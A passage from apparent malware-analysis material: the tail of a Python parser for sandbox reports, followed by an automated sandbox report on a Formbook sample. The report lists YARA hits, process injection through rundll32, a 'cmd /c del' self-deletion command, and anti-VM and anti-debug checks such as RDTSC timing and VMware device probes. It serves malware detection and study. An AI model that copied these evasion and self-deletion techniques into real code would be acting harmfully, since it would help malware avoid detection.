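    More than one region in a process means Nt* entry points were found outside
    the sample's own image range, which is worth a closer look in the dump."""
    regions = defaultdict(set)
    for pid, addr, apis in records:
        if any(a.startswith("Nt") for a in apis):
            regions[pid].add(addr & ~0xFFFF)
    return {pid: sorted(r) for pid, r in regions.items()}


def parse_dumps(lines):
    """Decode unique (process index, base address, protection) from *.sdmp names."""
    seen, dumps = set(), []
    for line in lines:
        for m in DUMP_RE.finditer(line):
            key = (int(m["pid"]), int(m["base"], 16))
            if key not in seen:
                seen.add(key)
                prot = int(m["prot"], 16)
                dumps.append((key[0], key[1], PAGE_PROTECTION.get(prot, hex(prot))))
    return dumps


if __name__ == "__main__":
    recs = parse_code_functions(SAMPLE_LINES)
    for pid, apis in injection_primitives(recs).items():
        print(f"process {pid}: injection primitives {apis}")
    for pid, regions in native_api_regions(recs).items():
        print(f"process {pid}: Nt* wrappers in {[hex(r) for r in regions]}")
    for pid, base, prot in parse_dumps(SAMPLE_LINES):
        print(f"process {pid}: Yara hit in dump at {base:#x} ({prot})")
```

Feed it the full report instead of SAMPLE_LINES (one entry per line) and the two regions it reports for process 1 are the sample's image at 0x0041xxxx and the second block at 0x00A4xxxx; the same split appears for process 6 at 0x0464xxxx and 0x02BBxxxx. The parser tolerates both the fused form shown in SAMPLE_LINES and a form with a separator before "Code function:".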
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/11
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE791.tmpJump to behavior
          Source: NdBLyH2h5d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: NdBLyH2h5d.exeVirustotal: Detection: 20%
          Source: NdBLyH2h5d.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\user\Desktop\NdBLyH2h5d.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'Jump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Unpacked PE file: 1.2.NdBLyH2h5d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode | 0_2_00401FDC
          Source: 6oxdti6l9qd.dll.0.dr | Static PE information: section name: .code
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041C8CC push es; ret 1_2_0041C8D3
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041925A push esp; retf 1_2_0041925F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B3FB push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B45C push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A5D0D1 push ecx; ret 1_2_00A5D0E4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041C8CC push es; ret 1_1_0041C8D3
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041925A push esp; retf 1_1_0041925F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B3F2 push eax; ret 1_1_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B3FB push eax; ret 1_1_0041B462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B3A5 push eax; ret 1_1_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B45C push eax; ret 1_1_0041B462
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0465D0D1 push ecx; ret 6_2_0465D0E4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB925A push esp; retf 6_2_02BB925F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB3A5 push eax; ret 6_2_02BBB3F8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB3FB push eax; ret 6_2_02BBB462
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB3F2 push eax; ret 6_2_02BBB3F8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBC8CC push es; ret 6_2_02BBC8D3
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB45C push eax; ret 6_2_02BBB462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | File created: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000002BA85E4 second address: 0000000002BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000002BA896E second address: 0000000002BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_004088A0 rdtsc | 1_2_004088A0
          Source: C:\Windows\explorer.exe TID: 6540 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA | 0_2_00405301
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose | 0_2_00405C94
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_004026BC FindFirstFileA | 0_2_004026BC
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.228623277.00000000056A1000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.233670194.0000000008907000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.233210221.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.492571726.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.233471521.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.228573395.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_004088A0 rdtsc | 1_2_004088A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00409B10 LdrLoadDll | 1_2_00409B10
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect | 0_2_740D1000
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode | 0_2_00401FDC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_02631868 mov eax, dword ptr fs:[00000030h] | 0_2_02631868
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_02631650 mov eax, dword ptr fs:[00000030h] | 0_2_02631650
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h] | 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h] | 1_2_00A490AF
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h] | 1_2_00A3F0BF
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h] | 1_2_00A3F0BF
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h] | 1_2_00A3F0BF
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h] | 1_2_00A09080
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h] | 1_2_00A83884
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h] | 1_2_00A83884
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] | 1_2_00A040E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] | 1_2_00A040E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h] | 1_2_00A040E1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h] | 1_2_00A058EC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] | 1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h] | 1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] | 1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] | 1_2_00A9B8D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h] | 1_2_00A9B8D0
